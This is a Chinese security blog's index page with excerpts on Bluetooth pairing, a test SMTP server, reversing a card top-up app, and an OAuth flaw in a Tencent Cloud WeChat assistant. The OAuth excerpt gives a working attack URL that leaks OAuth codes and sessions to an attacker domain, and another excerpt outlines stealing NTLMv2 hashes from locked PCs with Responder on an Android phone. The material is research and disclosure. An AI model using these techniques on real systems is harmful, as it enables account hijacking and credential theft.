蓝牙安全初探

传统蓝牙设备的攻击

蓝牙可能用来传输一些隐私的数据,有时候还需要在两个设备靠近时自动连接,因此引入了配对和绑定。

蓝牙配对模式

Numeric Comparison:配对双方都显示一个6位的数字,由用户来核对数字是否一致,一致即可配对。例如手机之间的配对。
Just Works:用于配对没有显示没有输入的设备,主动发起连接即可配对,用户看不到配对过程。例如连接蓝牙耳机。
Passkey Entry:要求配对目标输入一个在本地设备上显示的6位数字,输入正确即可配对。例如连接蓝牙键盘。
Out of Band:两设备的通过别的途径交换配对信息,例如NFC等。例如一些NFC蓝牙音箱。

查看更多

分享到 评论

搭建简单的Smtp Server

有些时候需要构造一些特殊的邮件地址,而很多邮箱提供商不支持过长或者支持Unicode字符以及有特殊符号的邮箱用户名,这时候就需要自己搭建一个能收取邮件的服务器。市面上有很多大型的搭建邮件服务器的方案,比较复杂,不适合在实际安全检测中使用,于是自己用python脚本实现了一个简单的方案。

查看更多

分享到 评论

腾讯云助手用户帐号劫持

之前在检测腾讯云安全的时候发现了一个oauth的问题,可以导致账号劫持。

问题出现微信腾讯云助手公共号的登陆上。在按照oauth2的标准,redirect_uri需要检查返回地址的host,微信的回调api严格检查了回调地址的host必须为login.cm.qcloud.com。但是,由于这个回调地址又做了一次重定向,这个重定向对host解析有误,导致oauth的code以及用于腾讯云助手的session泄露,让攻击者可以以受害者的身份登录。

攻击测试url:
http://sz.open.weixin.qq.com/connect/oauth2/authorize?appid=wx32d9ff109a3f81eb&redirect_uri=http%3A%2F%2Flogin.cm.qcloud.com%2Fauth%2Fredirect%3FandBind%3D0%26type%3Dweixin%26env%3Dproduct%26r%3Dao8tj%26redirect%3Dhttp%253A%252F%252F5alt.me%3f@yun.weixin.qcloud.com%252Findex%252Fcvmlist%253Ffrom_wx_login%253D1%26from_wx_oauth%3D1&response_type=code&scope=snsapi_base
发现会携带敏感信息跳转到攻击者受控的域名5alt.me上。

当然由于微信的安全机制,跳转到恶意域名会有一个中转页面,阻止进一步的跳转。但是经过测试,微信并没有拦截新浪云的二级域名。如果攻击者在新浪云注册5alt.sinaapp.com的应用并部署记录代码,即可从referer里获取oauth2返回的code并且从url里获取认证之后的session,从而登陆受害者的腾讯云助手页面。

查看更多

分享到 评论

e乐充app数据包加解密和签名算法

将APP的流量代理出来,抓包发现虽然走的是https,但没有验证证书,burpsuite可以抓到请求的内容,不过请求和响应的内容都加密了。逆向apk,发现用AES加密之后base64编码了一下,签名是拼接参数算md5。简单用python模拟了这个加解密的过程。敏感信息已打码。

分析充值的逻辑,发现手机只是充当了一个代理的作用,将卡片和充值服务器连接起来,与卡交互的流量是加密的。北京的公交卡采用的是NXP MIFARE DESFire的卡,用DES/3DES加密,无法获取到密钥破解卡片。

充值的订单与一卡通的卡号绑定,无法给其他的卡片充值,所以无法通过遍历未完成订单的方法来给自己充值。

尝试在写入一部分数据后移走卡片,此时查询卡片余额已经充值成功,订单仍然处于未完成的状态,但是此时已经无法退款,只能选择继续完成写卡。

到此为止没有其他的利用思路了,只能老老实实花钱充卡了。。

查看更多

分享到 评论

用安卓手机获取锁屏下windows电脑的登陆密码hash

之前看了一篇将USB模拟成网卡然后获取NTLMv2 Hash的文章,原文是通过一个装有Linux系统的USB设备来实现这一攻击。其基本思路是劫持电脑的流量,使其访问SMB协议的地址,那么SMB服务器就能获取到当前的用户名和密码的NTLMv2 Hash。攻击使用了Responser这个工具,来完成流量的劫持和SMB服务器的搭建。

如果没有一个这样的USB设备就不能完成这个攻击了么?答案当然是否定的。安卓手机有一个共享网络的功能,开启这个功能即可把安卓手机模拟成一个网卡设备。在安卓(需要root权限)上chroot运行一个linux系统,执行Responser,这样就能得到同样的攻击效果。

查看更多

分享到 评论

Hello World

换个模板从头再来

分享到 评论